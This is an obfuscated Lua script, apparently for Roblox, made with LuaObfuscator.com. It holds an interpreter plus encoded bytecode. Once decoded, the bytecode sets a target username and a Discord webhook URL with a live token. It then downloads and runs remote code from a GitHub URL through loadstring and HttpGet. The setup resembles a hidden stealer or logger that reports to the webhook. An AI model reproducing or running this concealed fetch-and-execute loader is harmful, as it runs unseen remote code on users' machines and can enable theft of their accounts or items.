--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==2) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end if (v0==5) then v16=nil;v16=function(v20,v21,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (v27==2) then v31=function()local v48=(0 + 0) -0 ;local v49;while true do if (v48==(1348 -(1091 + 256))) then return v49;end if (v48==(0 -0)) then v49=v2(v20,v28,v28);v28=v28 + 1 + 0 ;v48=1;end end end;v32=nil;v32=function()local v50=0 + 0 ;local v51;local v52;while true do if (1==v50) then return (v52 * (100 + 156)) + v51 ;end if (v50==0) then v51,v52=v2(v20,v28,v28 + 1 + 1 );v28=v28 + (3 -2) + 1 ;v50=1 + 0 ;end end end;v27=3;end if (v27==7) then v39=function(v40,v41,v42)local v53=0;local v54;local v55;local v56;while true do if (v53==1) then v56=v40[3];return function(...)local v90=1;local v91= -1;local v92={...};local v93=v13("#",...) -1 ;local function v94()local v104=v54;local v105=v55;local v106=v56;local v107=v37;local v108={};local v109={};local v110={};for v114=0 + 0 ,v93 do if (((1588 -(324 + 257))<=3561) and (v114>=v106)) then v108[v114-v106 ]=v92[v114 + (554 -((1192 -(555 + 126)) + 42)) ];else v110[v114]=v92[v114 + (320 -(121 + 198)) ];end end local v111=(v93-v106) + 1 ;local v112;local v113;while true do local v115=0;while true do if ((((889 -(244 + 112)) + 125)<=(1302 + 1706)) and ((1 -0)==v115)) then if ((v113<=(1523 -(511 + 1008))) or (1971>=4751)) then if ((v113<=(1134 -(849 + 284))) or ((3514 + 633)>(509 + 2976 + 696))) then if ((v113==0) or ((327 + 243)>(6116 -(735 + 917)))) then v110[v112[2]]();else local v142=1372 -(1228 + 144) ;local v143;local v144;while true do if ((v142==(0 -0)) or ((157 + 1671)>(11180 -7548))) then v143=v112[2];v144=v110[v112[8 -5 ]];v142=1;end if ((v142==(1270 -(955 + 314))) or (((7903 -(231 + 493)) -3263)<(2302 -(523 + 145)))) then v110[v143 + ((1 + 0) -0) ]=v144;v110[v143]=v144[v112[6 -2 ]];break;end end end elseif (((14632 -10281)==(491 + 3860)) and (v113<=(547 -(327 + 113 + 105)))) then v110[v112[2]]=v112[724 -(718 + 3) ];elseif (((596 + 4059)>=(11 + 641)) and (v113==3)) then local v157=628 -(249 + (2124 -(688 + 1057))) ;local v158;local v159;local v160;local v161;local v162;while true do if ((v157==(1 + 0)) or ((1175 + 1599)<(1371 -993))) then v160=nil;v161=nil;v157=(8 -3) -(4 -1) ;end if ((v157==((836 -511) -(290 + (1217 -(323 + 861))))) or ((14909 -10547)>=(17308 -12944))) then v162=nil;while true do if ((v158==(1397 -(839 + 558))) or (1636==(11448 -8370))) then local v187=0 + 0 ;while true do if ((v187==(0 + 0)) or ((3636 + 902)<=(1912 -(1746 -1142)))) then v159=v112[1 + 1 ];v160,v161=v107(v110[v159](v14(v110,v159 + 1 ,v112[4 -1 ])));v187=1 + 0 ;end if ((v187==1) or ((3238 -1299)>=(5635 -((943 -(318 + 313)) + 429)))) then v158=1 + 0 ;break;end end end if ((v158==(7 -(1406 -(354 + 1047)))) or ((2574 + (937 -390))<(571 -(168 + 318)))) then for v191=v159,v91 do local v192=0 + 0 ;while true do if ((v192==0) or ((1919 + 1401)<=1346)) then v162=v162 + (941 -(565 + 375)) ;v110[v191]=v160[v162];break;end end end break;end if (((2836 + 339)>=(21 + 305)) and (v158==(3 -2))) then local v188=0 + 0 ;while true do if ((v188==((2718 -762) -(1045 + 910))) or ((2316 -(1243 + (201 -(50 + 50))))>(12604 -8837))) then v158=2;break;end if ((v188==(1601 -(718 + 883))) or ((8277 -3617)<((2223 -(1307 + 647)) + 527))) then v91=(v161 + v159) -(412 -(79 + 256 + 76)) ;v162=0 -0 ;v188=285 -(151 + 133) ;end end end end break;end if ((v157==((0 -0) -0)) or (((3376 -(537 + 1208)) + 1047)==((4431 + 1478) -2237))) then v158=0 + 0 ;v159=nil;v157=1585 -(1350 + 234) ;end end else do return;end end elseif ((v113<=6) or ((1703 + 589)<=(3307 -(1135 + 541)))) then if (((2292 -(414 + 604))==(4068 -2794)) and (v113>(1740 -(1687 + 48)))) then v110[v112[7 -(1587 -(26 + 1556)) ]]=v42[v112[3]];else v90=v112[2 + 1 + 0 ];end elseif ((v113<=(7 + 0 + 0)) or ((1473 + 2490)<=(3829 -(1010 + 88 + 889)))) then local v150=511 -(459 + 52) ;local v151;local v152;while true do if ((382==((67 -53) + 368)) and (v150==(0 + 0))) then v151=0;v152=nil;v150=1;end if (((2390 -(561 + 557))<(1459 + 1206)) and (v150==1)) then while true do if (((0 + 0)==v151) or ((1380 + 1795)>4838)) then v152=v112[2 + 0 ];v110[v152]=v110[v152](v14(v110,v152 + (699 -(548 + 150)) ,v91));break;end end break;end end elseif (((1196 -(759 + 291))<(969 -351)) and (v113>(3 + 5))) then v42[v112[1471 -(359 + 1109) ]]=v110[v112[(1308 -(934 + 366)) -6 ]];elseif ((v110[v112[2]]==v112[5 -(1 + 0) ]) or (4233<=1268)) then v90=v90 + (1 -0) ;else v90=v112[3];end v90=v90 + (2 -1) ;break;end if ((((15743 -7754) -5046)<=(2850 + 211)) and ((0 -0)==v115)) then local v131=0 -0 ;while true do if (((2299 -(273 + 143))<((8550 -(933 + 1050)) -4111)) and (v131==(1160 -((1169 -(199 + 21)) + 211)))) then v112=v104[v90];v113=v112[313 -(67 + 245) ];v131=1;end if (((2709 + 1807)>=(3061 -(825 + 965))) and (1==v131)) then v115=1 + 0 ;break;end end end end end end A,B=v37(v12(v94));if  not A[1] then local v116=0;local v117;while true do if (v116==0) then v117=v40[4][v90] or "?" ;error("Script error at ["   .. v117   .. "]:"   .. A[2] );break;end end else return v14(A,2,B);end end;end if (v53==0) then v54=v40[1];v55=v40[2];v53=1;end end end;return v39(v38(),{},v21)(...);end if (v27==1) then v30=nil;v30=function(v43,v44,v45)if v45 then local v78=0;local v79;while true do if ((0 -0)==v78) then v79=(v43/((2 + (234 -(72 + 162)))^(v44-((902 -(214 + 237)) -(52 + 277 + 121)))))%(((1266 -(737 + 528)) + 1)^(((v45-1) -(v44-(1 + 0 + 0))) + (2 -1))) ;return v79-(v79%(753 -(513 + 239))) ;end end else local v80=678 -(655 + 23) ;local v81;while true do if (v80==(0 -(0 -0))) then v81=(1 + 1)^(v44-(1 -0)) ;return (((v43%(v81 + v81))>=v81) and 1) or 0 ;end end end end;v31=nil;v27=2;end if (v27==0) then v28=1;v29=nil;v20=v5(v4(v20,5),"..",function(v46)if (v2(v46,2)==79) then v29=v1(v4(v46,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v3(v1(v46,16));if v29 then local v119=v6(v83,v29);v29=nil;return v119;else return v83;end break;end end end end);v27=1;end if (v27==3) then v33=nil;v33=function()local v57,v58,v59,v60=v2(v20,v28,v28 + (680 -(610 + 67)) );v28=v28 + ((1055 -(903 + 145)) -3) ;return (v60 * (16779158 -(114 + 1828))) + (v59 * (40560 + 24976)) + (v58 * (2115 -(1533 + 326))) + v57 ;end;v34=nil;v27=4;end if (v27==5) then v36=v33;v37=nil;v37=function(...)return {...},v13("#",...);end;v27=6;end if (v27==6) then v38=nil;v38=function()local v61=0 -0 ;local v62;local v63;local v64;local v65;local v66;local v67;while true do if (v61==(1823 -(1145 + 676))) then for v95=1 + 0 ,v33() do local v96=1718 -(303 + 1415) ;local v97;local v98;while true do if (1==v96) then while true do if (v97==0) then v98=v31();if (v30(v98,2 -1 ,1433 -(109 + 1323) )==(0 + 0)) then local v135=0 + 0 ;local v136;local v137;local v138;local v139;local v140;while true do if (v135==2) then v140=nil;while true do if ((3 -2)==v136) then local v170=0;while true do if (v170~=(658 -(175 + 483))) then else local v177=0 + 0 ;while true do if (v177==1) then v170=1118 -(427 + 690) ;break;end if (v177==(0 -0)) then v139=nil;v140=nil;v177=1 + 0 ;end end end if (v170==(1609 -(835 + 773))) then v136=2 -0 ;break;end end end if (v136==0) then v137=0 -0 ;v138=nil;v136=1 + 0 ;end if (v136==2) then while true do if (v137==2) then local v178=0;local v179;while true do if (v178~=0) then else v179=0 -0 ;while true do if (v179~=(1108 -(351 + 756))) then else v137=3;break;end if (v179==0) then local v198=886 -(587 + 299) ;local v199;while true do if (v198==(0 + 0)) then v199=0 -0 ;while true do if (v199~=(1 + 0)) then else v179=353 -(105 + 247) ;break;end if (v199==(1825 -(242 + 1583))) then local v203=0 + 0 ;while true do if (v203==1) then v199=1262 -(910 + 351) ;break;end if (0==v203) then if (v30(v139,2 -1 ,3 -2 )~=1) then else v140[1675 -(180 + 1493) ]=v67[v140[2 -0 ]];end if (v30(v139,2,9 -7 )~=1) then else v140[6 -3 ]=v67[v140[4 -1 ]];end v203=1 + 0 ;end end end end break;end end end end break;end end end if (v137~=(1 -0)) then else local v180=1205 -(881 + 324) ;local v181;while true do if (v180~=(0 -0)) then else v181=0 + 0 ;while true do if (v181==1) then v137=2;break;end if (v181==(1328 -(386 + 942))) then v140={v32(),v32(),nil,nil};if (v138==(1053 -(963 + 90))) then local v200=0 + 0 ;local v201;while true do if (v200~=(0 -0)) then else v201=930 -(590 + 340) ;while true do if (v201~=0) then else v140[10 -7 ]=v32();v140[4]=v32();break;end end break;end end elseif (v138==(1699 -(1276 + 422))) then v140[3]=v33();elseif (v138==2) then v140[2 + 1 ]=v33() -((6 -4)^16) ;elseif (v138==(1 + 2)) then local v207=1392 -(801 + 591) ;local v208;local v209;while true do if (1~=v207) then else while true do if (v208==(0 + 0)) then v209=1507 -(178 + 1329) ;while true do if (v209~=(1517 -(1219 + 298))) then else v140[5 -2 ]=v33() -((2 -0)^(2 + 14)) ;v140[4]=v32();break;end end break;end end break;end if (v207==0) then v208=0 + 0 ;v209=nil;v207=1 + 0 ;end end end v181=1 + 0 ;end end break;end end end if (v137==(0 + 0)) then local v182=759 -(98 + 661) ;local v183;local v184;while true do if ((1476 -(859 + 617))==v182) then v183=0 + 0 ;v184=nil;v182=1;end if (v182==1) then while true do if (v183==(0 + 0)) then v184=0 -0 ;while true do if ((1561 -(1538 + 23))==v184) then v138=v30(v98,2,3);v139=v30(v98,9 -5 ,13 -7 );v184=688 -(680 + 7) ;end if (v184==1) then v137=1;break;end end break;end end break;end end end if (v137==3) then if (v30(v139,3,5 -2 )==1) then v140[1 + 3 ]=v67[v140[3 + 1 ]];end v62[v95]=v140;break;end end break;end end break;end if (v135~=(204 -(201 + 3))) then else local v153=0 + 0 ;while true do if (v153~=1) then else v135=434 -(250 + 183) ;break;end if (v153~=(0 -0)) then else v136=1194 -(817 + 377) ;v137=nil;v153=1;end end end if (v135~=(707 -(583 + 123))) then else local v154=0;while true do if (0==v154) then v138=nil;v139=nil;v154=1;end if (v154==1) then v135=2 + 0 ;break;end end end end end break;end end break;end if (v96==(927 -(523 + 404))) then v97=0 + 0 ;v98=nil;v96=1 + 0 ;end end end for v99=2 -1 ,v33() do v63[v99-(1819 -(416 + 1402)) ]=v38();end for v101=1193 -(744 + 448) ,v33() do v64[v101]=v33();end return v65;end if (v61~=(1 + 0)) then else local v87=913 -(360 + 553) ;while true do if (v87==2) then v61=2 + 0 ;break;end if (v87~=(1 + 0)) then else for v120=1 + 0 ,v66 do local v121=0 + 0 ;local v122;local v123;local v124;local v125;local v126;while true do if (v121==(1 + 1)) then v126=nil;while true do if (v122==(3 -1)) then while true do if (v123==(1334 -(556 + 778))) then local v155=1452 -(785 + 667) ;local v156;while true do if (v155==0) then v156=375 -(9 + 366) ;while true do if (0==v156) then local v186=1976 -(47 + 1929) ;while true do if (v186==(1 + 0)) then v156=1;break;end if (v186==0) then v124=0 + 0 ;v125=nil;v186=1 + 0 ;end end end if (v156~=(3 -2)) then else v123=1 + 0 ;break;end end break;end end end if (v123==(1139 -(797 + 341))) then v126=nil;while true do if (v124~=(0 + 0)) then else local v172=0;local v173;while true do if (v172==(648 -(480 + 168))) then v173=28 -(21 + 7) ;while true do if (v173==(3 -2)) then v124=1 + 0 ;break;end if (v173~=(0 -0)) then else local v193=1699 -(244 + 1455) ;local v194;while true do if (v193==0) then v194=0 + 0 ;while true do if (v194==(1 + 0)) then v173=44 -(24 + 19) ;break;end if (v194~=(0 -0)) then else v125=v31();v126=nil;v194=1;end end break;end end end end break;end end end if (v124==(1168 -(1145 + 22))) then if (v125==(1424 -(954 + 469))) then v126=v31()~=(0 + 0) ;elseif (v125==(9 -7)) then v126=v34();elseif (v125~=(2 + 1)) then else v126=v35();end v67[v120]=v126;break;end end break;end end break;end if (v122~=1) then else v125=nil;v126=nil;v122=2 + 0 ;end if (v122==(0 + 0)) then local v141=0 + 0 ;while true do if ((0 -0)~=v141) then else v123=0 -0 ;v124=nil;v141=1 -0 ;end if (v141==(686 -(74 + 611))) then v122=1776 -(1708 + 67) ;break;end end end end break;end if (v121==(0 + 0)) then v122=0;v123=nil;v121=1 -0 ;end if (v121==1) then v124=nil;v125=nil;v121=2;end end end v65[3]=v31();v87=2;end if (v87==0) then v66=v33();v67={};v87=1682 -(448 + 1233) ;end end end if (v61~=(902 -(723 + 179))) then else local v88=0 -0 ;local v89;while true do if (v88~=(0 + 0)) then else v89=0 + 0 ;while true do if (v89~=(146 -(49 + 95))) then else v61=501 -(446 + 54) ;break;end if (v89==(0 -0)) then local v132=0 -0 ;while true do if (v132==0) then v62={};v63={};v132=1 + 0 ;end if (v132==(2 -1)) then v89=1;break;end end end if (v89==(1 -0)) then v64={};v65={v62,v63,nil,v64};v89=3 -1 ;end end break;end end end end end;v39=nil;v27=7;end if (v27==4) then v34=function()local v68=v33();local v69=v33();local v70=1 + 0 ;local v71=(v30(v69,1,20) * ((1 + 1)^(123 -91))) + v68 ;local v72=v30(v69,(686 -(437 + 192)) -36 ,20 + 11 );local v73=((v30(v69,(192 -112) -48 )==(2 -1)) and  -(1 + 0)) or (1 + 0) ;if (v72==(0 + 0)) then if (v71==(0 -0)) then return v73 * ((0 -0) -0) ;else local v103=0 + 0 ;while true do if (v103==(198 -((352 -237) + 83))) then v72=1 -0 ;v70=61 -(32 + 19 + 10) ;break;end end end elseif (v72==(10188 -8141)) then return ((v71==(0 + 0)) and (v73 * (1/(0 -0)))) or (v73 * NaN) ;end return v9(v73,v72-(1461 -438) ) * (v70 + (v71/((1 + 1)^(6 + 46)))) ;end;v35=nil;v35=function(v47)local v74;if  not v47 then v47=v33();if (v47==(0 + 0)) then return "";end end v74=v4(v20,v28,(v28 + v47) -(2 -1) );v28=v28 + v47 ;local v75={};for v76=1 + 0 , #v74 do v75[v76]=v3(v2(v4(v74,v76,v76)));end return v7(v75);end;v27=5;end end end;v16("LOL!0A3O00028O0003083O00557365724E616D6503113O0068657969747361726D616E6O6903073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31303834383935323132333433362O373033382F42635A4972734D587432467475513930654367496E62457331677673536339544F5667535F396643562O5537696C334973747956376B694C742D78415650565F6C486C64026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B34662O742F72692O7A6875622F6D61696E2F4E65772E6C756100143O0012023O00013O0026083O0008000100010004053O00080001001202000100033O001209000100023O001202000100053O001209000100043O0012023O00063O0026083O0001000100060004053O00010001001206000100073O001206000200083O0020010002000200090012020004000A4O0003000200044O000700013O00024O0001000100010004053O001300010004053O000100012O00043O00017O00143O00023O00043O00043O00053O00053O00063O00063O00073O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O00",v10(),...);break;end if (v0==4) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v0=5;end if (v0==3) then v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=4;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end end end
